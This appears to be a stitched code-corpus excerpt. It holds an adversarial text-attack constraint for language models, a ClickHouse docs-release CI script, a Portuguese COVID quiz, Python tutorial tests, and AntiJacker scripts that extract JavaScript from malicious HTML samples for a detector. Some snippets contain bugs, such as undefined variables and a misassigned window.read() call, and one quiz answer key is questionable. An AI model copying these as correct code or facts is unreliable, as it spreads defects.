"""
Determines if two sentences have a swapped word that has a similar
probability according to a language model.
Args:
max_log_prob_diff (float): the maximum difference in log-probability
between x and x_adv
"""
def __init__(self, max_log_prob_diff=None):
if max_log_prob_diff is None:
raise ValueError("Must set max_log_prob_diff")
self.max_log_prob_diff = max_log_prob_diff
def get_log_probs_at_index(self, text_list, word_index):
""" Gets the log-probability of items in `text_list` at index
`word_index` according to a language model.
"""
raise NotImplementedError()
def _check_constraint(self, transformed_text, current_text, original_text=None):
try:
indices = transformed_text.attack_attrs["newly_modified_indices"]
except KeyError:
raise KeyError(
"Cannot apply language model constraint without `newly_modified_indices`"
)
for i in indices:
probs = self.get_log_probs_at_index((current_text, transformed_text), i)
if len(probs) != 2:
raise ValueError(
f"Error: get_log_probs_at_index returned {len(probs)} values for 2 inputs"
)
cur_prob, transformed_prob = probs
if self.max_log_prob_diff is None:
cur_prob, transformed_prob = math.log(p1), math.log(p2)
if abs(cur_prob - transformed_prob) > self.max_log_prob_diff:
return False
return True
def extra_repr_keys(self):
return ["max_log_prob_diff"]
``` |
{
"source": "540522905/ClickHouse",
"score": 2
} |
#### File: tests/ci/docs_release.py
```python
import logging
import subprocess
import os
import time
import json
import sys
from github import Github
from report import create_test_html_report
from s3_helper import S3Helper
from pr_info import PRInfo
from get_robot_token import get_best_robot_token
from ssh import SSHKey
NAME = "Docs Release (actions)"
def process_logs(s3_client, additional_logs, s3_path_prefix):
additional_urls = []
for log_path in additional_logs:
if log_path:
additional_urls.append(
s3_client.upload_test_report_to_s3(
log_path,
s3_path_prefix + "/" + os.path.basename(log_path)))
return additional_urls
def upload_results(s3_client, pr_number, commit_sha, test_results, additional_files):
s3_path_prefix = f"{pr_number}/{commit_sha}/docs_release"
additional_urls = process_logs(s3_client, additional_files, s3_path_prefix)
branch_url = "https://github.com/ClickHouse/ClickHouse/commits/master"
branch_name = "master"
if pr_number != 0:
branch_name = f"PR #{pr_number}"
branch_url = f"https://github.com/ClickHouse/ClickHouse/pull/{pr_number}"
commit_url = f"https://github.com/ClickHouse/ClickHouse/commit/{commit_sha}"
task_url = f"https://github.com/ClickHouse/ClickHouse/actions/runs/{os.getenv('GITHUB_RUN_ID')}"
raw_log_url = additional_urls[0]
additional_urls.pop(0)
html_report = create_test_html_report(NAME, test_results, raw_log_url, task_url, branch_url, branch_name, commit_url, additional_urls)
with open('report.html', 'w', encoding='utf-8') as f:
f.write(html_report)
url = s3_client.upload_test_report_to_s3('report.html', s3_path_prefix + ".html")
logging.info("Search result in url %s", url)
return url
def get_commit(gh, commit_sha):
repo = gh.get_repo(os.getenv("GITHUB_REPOSITORY", "ClickHouse/ClickHouse"))
commit = repo.get_commit(commit_sha)
return commit
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO)
temp_path = os.path.join(os.getenv("TEMP_PATH"))
repo_path = os.path.join(os.getenv("REPO_COPY"))
with open(os.getenv('GITHUB_EVENT_PATH'), 'r', encoding='utf-8') as event_file:
event = json.load(event_file)
pr_info = PRInfo(event, need_changed_files=True)
gh = Github(get_best_robot_token())
if not pr_info.has_changes_in_documentation():
logging.info ("No changes in documentation")
commit = get_commit(gh, pr_info.sha)
commit.create_status(context=NAME, description="No changes in docs", state="success")
sys.exit(0)
logging.info("Has changes in docs")
if not os.path.exists(temp_path):
os.makedirs(temp_path)
images_path = os.path.join(temp_path, 'changed_images.json')
docker_image = 'clickhouse/docs-release'
if os.path.exists(images_path):
logging.info("Images file exists")
with open(images_path, 'r', encoding='utf-8') as images_fd:
images = json.load(images_fd)
logging.info("Got images %s", images)
if 'clickhouse/docs-release' in images:
docker_image += ':' + images['clickhouse/docs-release']
logging.info("Got docker image %s", docker_image)
for i in range(10):
try:
subprocess.check_output(f"docker pull {docker_image}", shell=True)
break
except Exception as ex:
time.sleep(i * 3)
logging.info("Got execption pulling docker %s", ex)
else:
raise Exception(f"Cannot pull dockerhub for image {docker_image}")
test_output = os.path.join(temp_path, 'docs_release_log')
if not os.path.exists(test_output):
os.makedirs(test_output)
token = os.getenv('CLOUDFLARE_TOKEN')
cmd = "docker run --cap-add=SYS_PTRACE --volume=$SSH_AUTH_SOCK:/ssh-agent -e SSH_AUTH_SOCK=/ssh-agent " \
f"-e CLOUDFLARE_TOKEN={token} --volume={repo_path}:/repo_path --volume={test_output}:/output_path {docker_image}"
run_log_path = os.path.join(test_output, 'runlog.log')
with open(run_log_path, 'w', encoding='utf-8') as log, SSHKey("ROBOT_CLICKHOUSE_SSH_KEY"):
with subprocess.Popen(cmd, shell=True, stderr=log, stdout=log) as process:
retcode = process.wait()
if retcode == 0:
logging.info("Run successfully")
status = "success"
description = "Released successfuly"
else:
description = "Release failed (non zero exit code)"
status = "failure"
logging.info("Run failed")
subprocess.check_call(f"sudo chown -R ubuntu:ubuntu {temp_path}", shell=True)
files = os.listdir(test_output)
lines = []
additional_files = []
if not files:
logging.error("No output files after docs release")
description = "No output files after docs release"
status = "failure"
else:
for f in files:
path = os.path.join(test_output, f)
additional_files.append(path)
with open(path, 'r', encoding='utf-8') as check_file:
for line in check_file:
if "ERROR" in line:
lines.append((line.split(':')[-1], "FAIL"))
if lines:
status = "failure"
description = "Found errors in docs"
elif status != "failure":
lines.append(("No errors found", "OK"))
else:
lines.append(("Non zero exit code", "FAIL"))
s3_helper = S3Helper('https://s3.amazonaws.com')
report_url = upload_results(s3_helper, pr_info.number, pr_info.sha, lines, additional_files)
print("::notice ::Report url: {report_url}")
commit = get_commit(gh, pr_info.sha)
commit.create_status(context=NAME, description=description, state=status, target_url=report_url)
``` |
{
"source": "5405647/pca---python",
"score": 3
} |
#### File: 5405647/pca---python/main.py
```python
import PySimpleGUI as sg
def janelaPrincipal():
sg.theme('Dark Green 3')
layout = [
[sg.Text('Jogo de Perguntas e Respostas', font=("Unispace", 25))],
[sg.Text('\nVocê sabia que as chances de contrair a Covid-19 é proporcional ao seu conhecimento sobre ela?\nSerá que você está fazendo todas as medidas de segurança corretamente? É isso que nós vamos ver agora!',
font=("Arial", 13))],
[sg.Text('\nInstruções sobre o jogo', font=("Arial", 15, 'underline'))],
[sg.Text('Será elencado 15 questões sobre os meios de segurança para reduzir as chances de infecção pela Covid-19. Você\ndeve responder se a questão é um fato ou fake onde, após responder, será exibida a informação sobre a resposta correta.',
font=("Arial", 12))],
[sg.Text('\nPronto para começar?', font=("Arial", 15))],
[sg.Button('Sim', size=(10, 1)), sg.Button('Não', size=(10, 1))]
]
window = sg.Window('Falcões Memoráveis', layout, element_justification='c', modal=True)
while True:
event, values = window.read()
if event == sg.WIN_CLOSED or event == 'Não':
break
if event == 'Sim':
window.close()
pergunta1()
break
def pergunta1():
sg.theme('Dark Green 3')
layout = [
[sg.Text('1. Tudo bem compartilhar objetos, tipo o celular, pois o novo coronavírus não se transmite dessa forma.')],
[sg.Button('Fato'), sg.Button('Fake')]
]
window = sg.Window('Falcões Memoráveis', layout, element_justification='c', font=('Arial', 14), modal=True)
while True:
event, values = window.read()
if event == 'Fato':
[sg.Popup('Errou! Estudos já comprovaram que o novo coronavírus pode sobreviver em diversos tipos diferentes de objetos e superfícies.', font=('Arial', 13))]
window.close()
pergunta2()
break
else:
[sg.Popup('Acertou! Estudos já comprovaram que o novo coronavírus pode sobreviver em diversos tipos diferentes de objetos e superfícies.', font=('Arial', 13))]
window.close()
pergunta2()
break
def pergunta2():
sg.theme('Dark Green 3')
layout = [
[sg.Text('2. Não preciso me preocupar em higienizar as compras do mercado, afinal, eu mesmo peguei da prateleira com as mãos limpas.')],
[sg.Button('Fato'), sg.Button('Fake')]
]
window = sg.Window('Falcões Memoráveis', layout, element_justification='c', font=('Arial', 14), modal=True)
while True:
event, values = window.read()
if event == 'Fato':
[sg.Popup('Errou! Apesar de recentemente esse tipo de contaminação ter se revelado menos comum, higiene nunca é demais.', font=('Arial', 13))]
window.close()
pergunta3()
break
else:
[sg.Popup('Acertou! Apesar de recentemente esse tipo de contaminação ter se revelado menos comum, higiene nunca é demais.', font=('Arial', 13))]
window.close()
pergunta3()
break
def pergunta3():
sg.theme('Dark Green 3')
layout = [
[sg.Text('3. Em caso de sintomas gripais e estando em locais públicos, o mais indicado a se fazer é cobrir a boca com o antebraço ou o cotovelo ao espirrar e/ou tossir.')],
[sg.Button('Fato'), sg.Button('Fake')]
]
window = sg.Window('Falcões Memoráveis', layout, element_justification='c', font=('Arial', 14), modal=True)
while True:
event, values = window.read()
if event == 'Fato':
[sg.Popup('Errou! Fora de cada devemos usar máscara o tempo todo (exceto na hora de comer e beber) e respeitar o distanciamento. Além disso, com qualquer sintoma de gripe ou resfriado, o mais indicado é ficar em casa!', font=('Arial', 13))]
window.close()
pergunta4()
break
else:
[sg.Popup('Acertou! Fora de cada devemos usar máscara o tempo todo (exceto na hora de comer e beber) e respeitar o distanciamento. Além disso, com qualquer sintoma de gripe ou resfriado, o mais indicado é ficar em casa!', font=('Arial', 13))]
window.close()
pergunta4()
break
def pergunta4():
sg.theme('Dark Green 3')
layout = [
[sg.Text('4. Se me sinto bem e tomo todos os cuidados, tudo bem abraçar e beijar as pessoas com quem moro.')],
[sg.Button('Fato'), sg.Button('Fake')]
]
window = sg.Window('Falcões Memoráveis', layout, element_justification='c', font=('Arial', 14), modal=True)
while True:
event, values = window.read()
if event == 'Fato':
[sg.Popup('Acertou! Porém, baixar a guarda em casa é possível somente se todos estiverem respeitando as orientações sanitária. Caso contrário, mesmo se cuidado, você pode estar em risco dentro da sua própria casa.', font=('Arial', 13))]
window.close()
pergunta5()
break
else:
[sg.Popup('Errou! Baixar a guarda em casa é possível somente se todos estiverem respeitando as orientações sanitária. Caso contrário, mesmo se cuidado, você pode estar em risco dentro da sua própria casa.', font=('Arial', 13))]
window.close()
pergunta5()
break
def pergunta5():
sg.theme('Dark Green 3')
layout = [
[sg.Text('5. Os sintomas mais comuns da Covid-19 são: febre, tosse, cansaço, dor de cabeça e alteração do olfato.')],
[sg.Button('Fato'), sg.Button('Fake')]
]
window = sg.Window('Falcões Memoráveis', layout, element_justification='c', font=('Arial', 14), modal=True)
while True:
event, values = window.read()
if event == 'Fato':
[sg.Popup('Acertou! Mas fique atento(a): os sintomas não ocorrem no mesmo instante da infecção.', font=('Arial', 13))]
window.close()
pergunta6()
break
else:
[sg.Popup('Errou! Esses são os sintomas mais comuns, mas fique atento(a): os sintomas não ocorrem no mesmo instante da infecção.', font=('Arial', 13))]
window.close()
pergunta6()
break
def pergunta6():
sg.theme('Dark Green 3')
layout = [
[sg.Text('6. É possível estar com a Covid-19 por até 14 dias antes de apresentar os sintomas.')],
[sg.Button('Fato'), sg.Button('Fake')]
]
window = sg.Window('Falcões Memoráveis', layout, element_justification='c', font=('Arial', 14), modal=True)
while True:
event, values = window.read()
if event == 'Fato':
[sg.Popup('Acertou! O período de incubação varia entre 2 e 14 dias. E a média é de 5 dias.', font=('Arial', 13))]
window.close()
pergunta7()
break
else:
[sg.Popup('Errou! O período de incubação varia entre 2 e 14 dias. E a média é de 5 dias.', font=('Arial', 13))]
window.close()
pergunta7()
break
def pergunta7():
sg.theme('Dark Green 3')
layout = [
[sg.Text('7. Com mais de um ano de pandemia, já há medicamentos específicos e eficazes para o tratamento da Covid-19.')],
[sg.Button('Fato'), sg.Button('Fake')]
]
window = sg.Window('Falcões Memoráveis', layout, element_justification='c', font=('Arial', 14), modal=True)
while True:
event, values = window.read()
if event == 'Fato':
[sg.Popup('Errou! Ainda não há medicamento ideal para o combate ao vírus - em qualquer fase da doença - e automedicar-se é bastante perigoso, podendo levar à morte.', font=('Arial', 13))]
window.close()
pergunta8()
break
else:
[sg.Popup('Acertou! Ainda não há medicamento ideal para o combate ao vírus - em qualquer fase da doença - e automedicar-se é bastante perigoso, podendo levar à morte.', font=('Arial', 13))]
window.close()
pergunta8()
break
def pergunta8():
sg.theme('Dark Green 3')
layout = [
[sg.Text('8. Mesmo uma pessoa sem sintomas da COVID-19 pode contaminar outras.')],
[sg.Button('Fato'), sg.Button('Fake')]
]
window = sg.Window('Falcões Memoráveis', layout, element_justification='c', font=('Arial', 14), modal=True)
while True:
event, values = window.read()
if event == 'Fato':
[sg.Popup('Acertou! É importante lembrar que existe a possibilidade de uma pessoa transportar e transmitir o vírus por gotículas respiratórias e pelas mãoes contaminadas, sem estar apresentando qualquer sintoma da COVID-19.', font=('Arial', 13))]
window.close()
pergunta9()
break
else:
[sg.Popup('Errou! É importante lembrar que existe a possibilidade de uma pessoa transportar e transmitir o vírus por gotículas respiratórias e pelas mãoes contaminadas, sem estar apresentando qualquer sintoma da COVID-19.', font=('Arial', 13))]
window.close()
pergunta9()
break
def pergunta9():
sg.theme('Dark Green 3')
layout = [
[sg.Text('9. Usando máscara não é possível ser infectado.')],
[sg.Button('Fato'), sg.Button('Fake')]
]
window = sg.Window('Falcões Memoráveis', layout, element_justification='c', font=('Arial', 14), modal=True)
while True:
event, values = window.read()
if event == 'Fato':
[sg.Popup('Errou! O uso da máscara é fundamental, mas precisa estar em conjunção com aqueles outros cuidados: distanciamento social e higienização constante das mãos.', font=('Arial', 13))]
window.close()
pergunta10()
break
else:
[sg.Popup('Acertou! O uso da máscara é fundamental, mas precisa estar em conjunção com aqueles outros cuidados: distanciamento social e higienização constante das mãos.', font=('Arial', 13))]
window.close()
pergunta10()
break
def pergunta10():
sg.theme('Dark Green 3')
layout = [
[sg.Text('10. A COVID-19 é mais perigosa para indivíduos acima dos 60 anos ou debilitados, portadores de doenças crônicas e crianças.')],
[sg.Button('Fato'), sg.Button('Fake')]
]
window = sg.Window('Falcões Memoráveis', layout, element_justification='c', font=('Arial', 14), modal=True)
while True:
event, values = window.read()
if event == 'Fato':
[sg.Popup('Errou! Crianças não estão no grupo de risco, mas nada de relaxar os cuidados. Mesmo sendo mais raros, muitos casos graves em crianças têm sido relatados.', font=('Arial', 13))]
window.close()
pergunta11()
break
else:
[sg.Popup('Acertou! Crianças não estão no grupo de risco, mas nada de relaxar os cuidados. Mesmo sendo mais raros, muitos casos graves em crianças têm sido relatados.', font=('Arial', 13))]
window.close()
pergunta11()
break
def pergunta11():
sg.theme('Dark Green 3')
layout = [
[sg.Text('11. Enquanto não temos vacina suficiente para toda a população, a imunização de rebanho se mostra uma boa estratégia.')],
[sg.Button('Fato'), sg.Button('Fake')]
]
window = sg.Window('Falcões Memoráveis', layout, element_justification='c', font=('Arial', 14), modal=True)
while True:
event, values = window.read()
if event == 'Fato':
[sg.Popup('Errou! Além de colocar em risco boa parte da população, apostar na imunidade de rebanho e deixar a epidemia avançar favoreceria o desenvolvimento de novas cepas do vírus que podem ser mais agressivas ou resistentes à vacina.', font=('Arial', 13))]
window.close()
pergunta12()
break
else:
[sg.Popup('Acertou! Além de colocar em risco boa parte da população, apostar na imunidade de rebanho e deixar a epidemia avançar favoreceria o desenvolvimento de novas cepas do vírus que podem ser mais agressivas ou resistentes à vacina.', font=('Arial', 13))]
window.close()
pergunta12()
break
def pergunta12():
sg.theme('Dark Green 3')
layout = [
[sg.Text('12. Devo procurar hospital quando estiver espirrando.')],
[sg.Button('Fato'), sg.Button('Fake')]
]
window = sg.Window('Falcões Memoráveis', layout, element_justification='c', font=('Arial', 14), modal=True)
while True:
event, values = window.read()
if event == 'Fato':
[sg.Popup('Errou! Estar espirrando não é condição suficiente para se deslocar até o hospital. Procure atendimento médico se surgir febre ou apresentar sinais de fadiga ou desconforto para respirar.', font=('Arial', 13))]
window.close()
pergunta13()
break
else:
[sg.Popup('Acertou! Estar espirrando não é condição suficiente para se deslocar até o hospital. Procure atendimento médico se surgir febre ou apresentar sinais de fadiga ou desconforto para respirar.', font=('Arial', 13))]
window.close()
pergunta13()
break
def pergunta13():
sg.theme('Dark Green 3')
layout = [
[sg.Text('13. É melhor sempre evitar ir ao hospital, mesmo que para controlar doenças crônicas, e diminuir as chances de exposição ao vírus.')],
[sg.Button('Fato'), sg.Button('Fake')]
]
window = sg.Window('Falcões Memoráveis', layout, element_justification='c', font=('Arial', 14), modal=True)
while True:
event, values = window.read()
if event == 'Fato':
[sg.Popup('Errou! Várias situações, como dor torácica, falta de ar, palpitações, desmaio, perda de força, convulsão, dor abdominal intensa e hemorragias, exigem atendimento médico imediato e não procurá-lo pode ter graves consequências. Além disso, todos os cuidados no controle de doenças crônicas, como diabetes, hipertensão, insuficiência cardíaca, doenças reumatológicas, oncológicas e pulmonares, devem ser mantidos, tá?', font=('Arial', 13))]
window.close()
pergunta14()
break
else:
[sg.Popup('Acertou! Várias situações, como dor torácica, falta de ar, palpitações, desmaio, perda de força, convulsão, dor abdominal intensa e hemorragias, exigem atendimento médico imediato e não procurá-lo pode ter graves consequências. Além disso, todos os cuidados no controle de doenças crônicas, como diabetes, hipertensão, insuficiência cardíaca, doenças reumatológicas, oncológicas e pulmonares, devem ser mantidos, tá?', font=('Arial', 13))]
window.close()
pergunta14()
break
def pergunta14():
sg.theme('Dark Green 3')
layout = [
[sg.Text('14. A vacina da gripe não protege contra a COVID-19.')],
[sg.Button('Fato'), sg.Button('Fake')]
]
window = sg.Window('Falcões Memoráveis', layout, element_justification='c', font=('Arial', 14), modal=True)
while True:
event, values = window.read()
if event == 'Fato':
[sg.Popup('Acertou! Porém é importante se vacinar para diminuir o volume de pessoas procurando atendimento médico e favorecer o diagnóstico mais rápido da COVID-19.', font=('Arial', 13))]
window.close()
pergunta15()
break
else:
[sg.Popup('Errou! Porém é importante se vacinar para diminuir o volume de pessoas procurando atendimento médico e favorecer o diagnóstico mais rápido da COVID-19.', font=('Arial', 13))]
window.close()
pergunta15()
break
def pergunta15():
sg.theme('Dark Green 3')
layout = [
[sg.Text('15. Qualquer sabão serve para proteger as mãos do contato com o vírus.')],
[sg.Button('Fato'), sg.Button('Fake')]
]
window = sg.Window('Falcões Memoráveis', layout, element_justification='c', font=('Arial', 14), modal=True)
while True:
event, values = window.read()
if event == 'Fato':
[sg.Popup('Acertou! A boa e velha prática nunca sai de moda.', font=('Arial', 13))]
window.close()
conclusao()
break
else:
[sg.Popup('Errou! A boa e velha prática nunca sai de moda.', font=('Arial', 13))]
window.close()
conclusao()
break
def conclusao():
sg.theme('Dark Green 3')
layout = [
[sg.Text('Fim de Jogo!', font=("Unispace", 25, 'underline'))],
[sg.Text('''Esperamos que com esse jogo você consiga ter absorvido o
máximo de informações a respeito dessa pandemia que assola
o mundo e, com isso, adote todas as medidas necessárias para
se evitar ser contaminado pela COVID-19.''', font=("Arial", 14))],
[sg.Text('Obrigado por participar do nosso jogo!', font=("Arial", 14))],
[sg.Button('Sair', size=(10, 1))]
]
window = sg.Window('Falcões Memoráveis', layout, element_justification='c', modal=True)
while True:
window, event, values = window.read()
if event == sg.WIN_CLOSED or event == 'Sair':
break
janelaPrincipal()
``` |
{
"source": "54070356/python-tutorial",
"score": 4
} |
#### File: python-tutorial/core/basic_test.py
```python
import unittest
class MyTestCase(unittest.TestCase):
def test_return(self):
def f1():
a = 'a'
b = 'b'
return a, b
r1, _ = f1()
self.assertEqual(r1, 'a')
r1, *_ = f1()
self.assertEqual(r1, 'a')
r1, r2 = f1()
self.assertEqual(r2, 'b')
if __name__ == '__main__':
unittest.main()
```
#### File: python-tutorial/core/dataclass_test.py
```python
import unittest
from dataclasses import dataclass, field
@dataclass
class Person:
name: str = 'tom'
age: int = 12
class MyTestCase(unittest.TestCase):
def test_something(self):
person = Person('Jack', 10)
print(person)
self.assertEqual(True, True)
if __name__ == '__main__':
unittest.main()
```
#### File: python-tutorial/core/dict_test.py
```python
import unittest
class MyTestCase(unittest.TestCase):
def test_1(self):
A = 'a'
dict1 = {
A: 'v'
}
self.assertEqual('v', dict1.get('a'))
def test_empty(self):
d1 = {}
if not d1:
print('empty')
d2 = {'k': 'v'}
if d2:
print('not empty')
else:
print('empty')
self.assertEqual(True, True)
def test_case3(self):
"""
遍历字典
"""
self.assertEqual(True, True)
def test_del(self):
"""
删除元素
"""
dict1 = {
'a': 'av',
'b': 'bv'
}
print('origin:', dict1)
del dict1['a']
print('del a:', dict1)
# del dict1['c'] will raise exception
dict1.pop('c', None)
print('del c:', dict1)
self.assertEqual(True, True)
def test_size(self):
d1 = {'k1': 'v1', 'k2': 'v2'}
self.assertEqual(len(d1), 2)
def test_get(self):
d1 = {
'k1': 'v1',
'k2': None
}
self.assertEqual(d1.get('k1'), 'v1')
self.assertEqual(d1.get('k2'), None)
self.assertEqual(d1.get('k2', 'v2'), None)
self.assertEqual(d1.get('k3'), None)
self.assertEqual(d1.get('k3', 'v3'), 'v3')
def test_set(self):
d1 = {'k1': 'v1'}
self.assertEqual(d1.get('k1'), 'v1')
d1['k2'] = 'v2'
self.assertEqual(d1.get('k2'), 'v2')
def test_update(self):
d1 = {'k1': 'v1', 'k2': 'v2'}
self.assertEqual(len(d1), 2)
d2 = {'k2': 'v2-new', 'k3': 'v3'}
d1.update(d2)
self.assertEqual(len(d1), 3)
self.assertEqual(d1.get('k1'), 'v1')
self.assertEqual(d1.get('k2'), 'v2-new')
self.assertEqual(d1.get('k3'), 'v3')
if __name__ == '__main__':
unittest.main()
```
#### File: python-tutorial/core/dir_test.py
```python
import shutil
import unittest
import pathlib
class MyTestCase(unittest.TestCase):
def test_delete_dir(self):
a_dir = 'logs'
shutil.rmtree(a_dir)
self.assertEqual(True, True)
def test_parent(self):
fn = 'dir_test.py'
print(pathlib.Path(fn).parent)
self.assertEqual(True, True)
if __name__ == '__main__':
unittest.main()
```
#### File: python-tutorial/core/numpy_array_test.py
```python
import unittest
import numpy as np
class MyTestCase(unittest.TestCase):
def test_slice(self):
a = np.array([0, 1, 2, 3, 4])
print(a[:-3:-1])
print(a[:-2:-1])
self.assertEqual([4], a[:-2:-1])
def test_argsort(self):
a = np.array([0.4, 0.2, 0.3])
print(a.argsort())
self.assertEqual(True, (np.array([0, 1, 2]) == a.argsort()).all())
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "5412jason/AntiJacker",
"score": 3
} |
#### File: 5412jason/AntiJacker/Malicious_parser.py
```python
import os
path = "C:\\Users\\17862\\OneDrive\\Desktop\\Datasets\\malicious_data"
os.chdir(path)
def read_File(file_path, file):
try:
with open(file_path, "r") as f:
lines = f.readlines()
#print(lines)
except Exception as e:
try:
with open(file_path, "r", encoding="utf-8") as f:
lines = f.readlines()
#print(lines)
except Exception as e2:
try:
with open(file_path, "r", encoding="latin1") as f:
lines = f.readlines()
# print(lines)
except Exception as e3:
return False
javascript = []
start = False
for line in lines:
if "<script" in line:
script_Start = line.find("<script")
line = line[script_Start:]
#javascript.append(line)
start = True
if "</script>" in line:
script_End = line.find("</script>")
line = line[:script_End + 9]
javascript.append(line)
start = False
if start == True:
javascript.append(line)
try:
with open("C:\\Users\\17862\\OneDrive\\Desktop\\Datasets\\malicious_js\\" + file + ".js", "w") as f:
f.writelines(javascript)
except Exception as e:
try:
with open("C:\\Users\\17862\\OneDrive\\Desktop\\Datasets\\malicious_js\\" + file + ".js", "w", encoding="utf-8") as f:
f.writelines(javascript)
except Exception as e2:
try:
with open("C:\\Users\\17862\\OneDrive\\Desktop\\Datasets\\malicious_js\\" + file + ".js", "w", encoding="latin1") as f:
f.writelines(javascript)
except Exception as e3:
return False
return True
for file in os.listdir():
file_path = f"{path}\{file}"
#print(file_path)
read_File(file_path, file)
```
#### File: AntiJacker/models/dataset.py
```python
import tensorflow as tf
import matplotlib.pyplot as plt
from tensorflow.keras import datasets, layers, models, losses
import numpy as np
import matplotlib.pyplot as plt
import os
import cv2
from tqdm import tqdm
import random
import pickle
DATADIR = "/home/jason/projects/AntiJacker/hilbert"
CATEGORIES = ["benign", "malicious"]
X_IMG_SIZE = 32
Y_IMG_SIZE = 32
training_data = []
def create_training_data():
for category in CATEGORIES:
path = os.path.join(DATADIR,category) # create path
class_num = CATEGORIES.index(category) # get the classification (0 or a 1). 0=benign 1=malicious
for img in tqdm(os.listdir(path)):
try:
img_array = cv2.imread(os.path.join(path,img) ,cv2.IMREAD_GRAYSCALE) # convert to array
new_array = cv2.resize(img_array, (X_IMG_SIZE, Y_IMG_SIZE)) # resize to normalize data size
training_data.append([new_array, class_num]) # add this to our training_data
except Exception as e: # in the interest in keeping the output clean...
pass
#except OSError as e:
# print("OSErrroBad img most likely", e, os.path.join(path,img))
#except Exception as e:
# print("general exception", e, os.path.join(path,img))
print(len(training_data))
random.shuffle(training_data)
x = []
y = []
for sample in training_data[:30]:
print(sample[1])
for features, label in training_data:
x.append(features)
y.append(label)
x = np.array(x).reshape(-1, X_IMG_SIZE, Y_IMG_SIZE, 1)
pickle_out = open("X.pickle", "wb")
pickle.dump(x, pickle_out)
pickle_out.close()
pickle_out = open("Y.pickle", "wb")
pickle.dump(y, pickle_out)
pickle_out.close()
def load_training_data():
if (os.path.exists("X.pickle") is False) or (os.path.exists("Y.pickle") is False):
create_training_data()
pickle_in = open("X.pickle","rb")
X = pickle.load(pickle_in)
pickle_in = open("Y.pickle","rb")
Y = pickle.load(pickle_in)
return X, Y
``` |
{
"source": "541736690/icpc-book",
"score": 3
} |
#### File: codes/old_template/math_pell.py
```python
def pell(n):
p1 = q0 = h1 = 1
p0 = q1 = g1 = 0
a2 = int(math.floor(math.sqrt(n)+1e-7))
if a2*a2 == n:
return (-1, -1)
ai = a2
ii = 1
while True:
ii += 1
g1 = -g1 + ai*h1
h1 = (n - g1*g1)/h1
p0, p1 = p1, ai*p1 + p0
q0, q1 = q1, ai*q1 + q0
ai = (g1 + a2)/h1
if p1*p1 - n*q1*q1 == 1:
print ii
return (p1, q1)
``` |
{
"source": "544146/clipsync-new",
"score": 2
} |
#### File: 544146/clipsync-new/main.py
```python
import praw
import yaml
import time
import logging
from praw.reddit import Comment
from reddit.src.handleComment import handleComment
logging.basicConfig(filename='debug.log',
level=logging.DEBUG,
format='%(asctime)s - %(name)s - %(threadName)s - %(levelname)s - %(message)s')
POLLING_TIME = 5
# # todo: use database for caching and validating vs existing requests
# # todo: alternate host.docker.internal/localhost based on docker/local
# database = pymongo.MongoClient("host.docker.internal", 27017).clipsync
def init_praw():
praw_config = config.get('praw')
return praw.Reddit(
username=praw_config.get('username'),
password=<PASSWORD>('password'),
client_id=praw_config.get('client_id'),
client_secret=praw_config.get('client_secret'),
user_agent=praw_config.get('user_agent')
)
if __name__ == "__main__":
config = yaml.safe_load(open("config.yml"))
reddit = init_praw()
subreddits = config.get('subreddits')
# todo: test that this works with large number of subreddits
subredditsUnion = "+".join(subreddits)
botUsername = config.get('praw').get('username')
# todo: cache these in a database rather than memory
seenComments = set()
while True:
try:
for comment in reddit.subreddit(subredditsUnion).comments(limit=100):
if comment.id not in seenComments:
seenComments.add(comment.id)
try:
reply = handleComment(comment, botUsername)
except Exception as e:
logging.error(e)
for mention in reddit.inbox.mentions(limit=100):
if mention.id not in seenComments and isinstance(mention, Comment):
seenComments.add(mention.id)
try:
reply = handleComment(mention, botUsername)
except Exception as e:
logging.error(e)
if (len(seenComments)) > 2000:
seenComments.clear()
print(len(seenComments))
time.sleep(POLLING_TIME)
print("polling again.")
except Exception as e:
logging.error(e)
``` |
{
"source": "5455945/SeetaFaceEngine",
"score": 2
} |
#### File: python/pyseeta/identifier.py
```python
import copy as cp
import os
import sys
from ctypes import *
from ctypes.util import find_library
import numpy as np
from .common import _Face, _Image, _LandMarks
from .config import get_identifier_library
lib_path = find_library('seeta_fi_lib')
if lib_path is None:
lib_path = get_identifier_library()
identi_lib = cdll.LoadLibrary(lib_path)
c_float_p = POINTER(c_float)
identi_lib.get_face_identifier.restype = c_void_p
identi_lib.get_face_identifier.argtypes = [c_char_p]
identi_lib.extract_feature_with_crop.restype = c_float_p
identi_lib.extract_feature_with_crop.argtypes = [c_void_p, POINTER(_Image), POINTER(_LandMarks)]
identi_lib.crop_face.restype = POINTER(_Image)
identi_lib.crop_face.argtypes = [c_void_p, POINTER(_Image), POINTER(_LandMarks)]
identi_lib.extract_feature.restype = c_float_p
identi_lib.extract_feature.argtypes = [c_void_p, POINTER(_Image)]
identi_lib.calc_similarity.restype = c_float
identi_lib.calc_similarity.argtypes = [c_void_p, c_float_p, c_float_p]
identi_lib.free_feature.restype = None
identi_lib.free_feature.argtypes = [c_float_p]
identi_lib.free_image_data.restype = None
identi_lib.free_image_data.argtypes = [POINTER(_Image)]
identi_lib.free_identifier.restype = None
identi_lib.free_identifier.argtypes = [c_void_p]
class Identifier(object):
""" Class for Face identification
"""
def __init__(self, model_path=None):
if model_path is None:
model_path = '../model/seeta_fr_v1.0.bin'
assert os.path.isfile(model_path) is True, 'No such file!'
byte_model_path = model_path.encode('utf-8')
self.identifier = identi_lib.get_face_identifier(byte_model_path)
def crop_face(self, image, landmarks):
""" Crop face image from original image
Args:
image: a color image
landmarks: a list of point (x,y), length is five
Returns:
a numpy array image
"""
# handle pillow image
if not isinstance(image, np.ndarray):
image = np.array(image)
# prepare image data
image_data = _Image()
image_data.height, image_data.width = image.shape[:2]
image_data.channels = 1 if len(image.shape) == 2 else image.shape[2]
image_data.data = image.ctypes.data
# prepare landmarks
marks_data = _LandMarks()
for i in range(5):
marks_data.x[i], marks_data.y[i] = landmarks[i]
# call crop face function
crop_data = identi_lib.crop_face(self.identifier, byref(image_data), byref(marks_data))
# read crop data
contents = crop_data.contents
crop_shape = (contents.height, contents.width, contents.channels)
nb_pixels = np.product(crop_shape)
byte_data = cast(contents.data, POINTER(c_ubyte))
byte_data = (c_ubyte * nb_pixels)(*byte_data[:nb_pixels])
image_crop = np.fromstring(byte_data, dtype=np.uint8).reshape(crop_shape)
# free crop data
identi_lib.free_image_data(crop_data)
return image_crop
def extract_feature(self, image):
""" Extract feature of cropped face image
Args:
image: a color image
Returns:
a list of float, the length is 2048
"""
# handle pillow image
if not isinstance(image, np.ndarray):
image = np.array(image)
# prepare image data
image_data = _Image()
